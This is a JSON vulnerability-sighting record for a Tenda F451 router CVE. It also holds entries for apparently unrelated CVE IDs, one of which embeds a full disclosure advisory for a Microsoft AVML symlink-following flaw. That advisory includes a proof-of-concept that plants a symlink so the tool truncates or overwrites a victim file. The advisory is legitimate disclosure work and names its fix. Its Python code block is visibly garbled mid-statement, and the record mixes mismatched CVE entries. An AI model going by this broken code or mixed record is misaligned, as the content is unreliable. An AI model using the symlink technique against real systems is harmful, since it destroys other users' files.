{"vulnerability": "cve-2026-6137", "sightings": [{"uuid": "c2915bc2-6021-44c8-b721-8cd91c6bf2f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-6137", "type": "seen", "source": "https://infosec.exchange/users/vuldb/statuses/116390595889322157", "content": "", "creation_timestamp": "2026-04-12T07:39:11.945471Z"}, {"uuid": "0f6a4096-5142-4655-89cf-b5d090c1222e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-6137", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mjdpa2av6y2x", "content": "", "creation_timestamp": "2026-04-13T01:21:07.655672Z"}, {"uuid": "d218b272-6b76-4483-a9c0-77df7bd5fa1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-6137", "type": "published-proof-of-concept", "source": "Telegram/nag6kHTmr7R2m3RBAp9Z6zI9_Kn5ruvnm4vlyMwU_2lthiM", "content": "", "creation_timestamp": "2026-04-13T01:17:42.000000Z"}, {"uuid": "ed108baa-ff21-403a-8d53-6d4a2ecab1a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-6137", "type": "seen", "source": "https://bsky.app/profile/cyberhub.blog/post/3mkqhqrtm4n2p", "content": "\ud83d\udccc CVE-2026-6137 - A vulnerability was detected in Tenda F451 1.0.0.7_cn_svn7958. The affected element is the function fromAdvSetWan of the file /goform/AdvSetWan. The m... https://www.cyberhub.blog/cves/CVE-2026-6137", "creation_timestamp": "2026-04-30T20:37:08.166089Z"}, {"uuid": "ff1702b5-d9be-4fe9-99a4-4a3670d94d99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-61371", "type": "seen", "source": "https://gist.github.com/thesmartshadow/2d099071f847de8db3dc4bbaf4dfa6df", "content": "# CVE-2026-61371\n\n## Microsoft AVML symlink following on destination output open (CWE-59)\n\nMicrosoft AVML before 0.17.0 could follow a symlink when opening a destination output path on Unix. If the destination path is a symlink, AVML follows it and truncates or overwrites the symlink target. The destructive open happens through O_TRUNC at open time, and it occurs before the input is fully validated. An invalid input still leaves the target truncated to zero, which is why this is described as truncation before validation.\n\n## Affected and fixed\n\nAffected: all versions before 0.17.0, including the 0.16.x line.\n\nFixed: 0.17.0. The fix adds O_NOFOLLOW to the Unix destination open so AVML no longer follows a symlink when creating the output file.\n\n## Vulnerability details\n\nProduct: Microsoft AVML (microsoft/avml)\n\nType: CWE-59, Improper Link Resolution Before File Access\n\nImpact: integrity and availability. The symlink target is truncated or overwritten with the privileges of the process running AVML, including the case where AVML later exits with an error after the truncation has already taken place.\n\nThreat model: a local user who can create or replace the destination path with a symlink before AVML opens it. This is most relevant on shared or staging output directories used in forensic and incident response workflows, where the output path is often predictable and writable by more than one user.\n\n## Root cause\n\nOn Unix, the destination output path is opened using OpenOptions with create and truncate set, and without any open time symlink restriction.\n\n```rust\nOpenOptions::new()\n    .create(true)\n    .truncate(true)\n    .write(true)\n    .open(path)\n```\n\nBecause there is no O_NOFOLLOW at open time, a symlink at the destination path is followed and its target is truncated. The truncation is applied by the kernel the moment the file is opened, so a parsing failure later in the pipeline does not undo it.\n\nPre fix code paths (commit 2732a12):\n\nDestination open in open_dst: https://github.com/microsoft/avml/blob/2732a12a0ee4ef7179b191ee1663e3a9d455d3ee/src/image.rs#L191-L199\n\nEarly destination open in Image::new, where truncation happens before validation: https://github.com/microsoft/avml/blob/2732a12a0ee4ef7179b191ee1663e3a9d455d3ee/src/image.rs#L207-L234\n\nCLI call sites in avml-convert: https://github.com/microsoft/avml/blob/2732a12a0ee4ef7179b191ee1663e3a9d455d3ee/src/bin/avml-convert.rs#L19-L45\n\n## Proof of concept\n\nThe following runs in a controlled directory against a harmless victim file. It shows two things: a symlink target being overwritten, and the same target being truncated even when the input is invalid and the tool exits with an error.\n\nBuild:\n\n```bash\ncargo build --release\n```\n\nCreate a minimal valid LiME input with a one byte payload:\n\n```bash\npython3 - &lt;&lt;'PY'\nimport struct\nLIME_MAGIC = 0x4c694d45  # \"EMiL\" little-endian\nversion = 1\nstart = 0\nend_inclusive = 0\npadding = 0\npayload = b'X'\nwith open(\"in.lime\", \"wb\") as f:\n    f.write(struct.pack(\" victim.txt\nln -sf victim.txt out.lime\n./target/release/avml-convert --source-format lime --format lime_compressed in.lime out.lime\nhexdump -C victim.txt | head\n```\n\nResult: victim.txt no longer contains its original text. Its content now begins with the LiME header EMiL, proving the symlink target was written through.\n\nCase 2, truncation before validation with invalid input:\n\n```bash\nprintf \"SAFE_TEST_FILE\\n\" &gt; victim.txt\nln -sf victim.txt out.lime\nprintf \"NOT_A_LIME\\n\" &gt; bad.lime\n./target/release/avml-convert --source-format lime --format lime_compressed bad.lime out.lime; echo \"exit=$?\"\nls -l victim.txt\n```\n\nResult: the tool exits with a non zero status because the input is not valid LiME, yet victim.txt is already size zero. The destination was truncated at open time before the input was rejected.\n\n## Syscall evidence\n\nCapturing the relevant syscalls:\n\n```bash\nstrace -o trace.log -f -e trace=openat,openat2,ftruncate,truncate,write \\\n  ./target/release/avml-convert --source-format lime --format lime_compressed in.lime out.lime || true\ngrep -E 'openat2?\\(|out\\.lime|O_TRUNC|write\\(' trace.log\n```\n\nThe destination is opened with O_TRUNC and without O_NOFOLLOW, then written:\n\n```\nopenat(AT_FDCWD, \"out.lime\", O_WRONLY|O_CREAT|O_TRUNC|O_CLOEXEC, 0600) = 4\nwrite(4, \"EMiL\\1\\0\\0\\0...\", 32) = 32\nwrite(4, \"X\", 1) = 1\n```\n\nThe absence of O_NOFOLLOW is the core of the issue. The kernel resolves the symlink and truncates the target as part of the open call.\n\n## The fix\n\nThe upstream fix adds O_NOFOLLOW to the Unix destination open through custom_flags, so a symlink at the destination path causes the open to fail instead of following the link.\n\nPull request: https://github.com/microsoft/avml/pull/754\n\nFiles changed, showing custom_flags(O_NOFOLLOW): https://github.com/microsoft/avml/pull/754/files\n\nRelease with the fix: https://github.com/microsoft/avml/releases/tag/v0.17.0\n\n## Credit\n\nReporte by Ali Firas (thesmartshadow)\n", "creation_timestamp": "2026-07-10T21:53:30.893120Z"}, {"uuid": "07dd2e34-b9d5-40ba-9a12-dc437e560501", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-61378", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-197-04", "content": "", "creation_timestamp": "2026-07-16T16:15:23.630507Z"}]}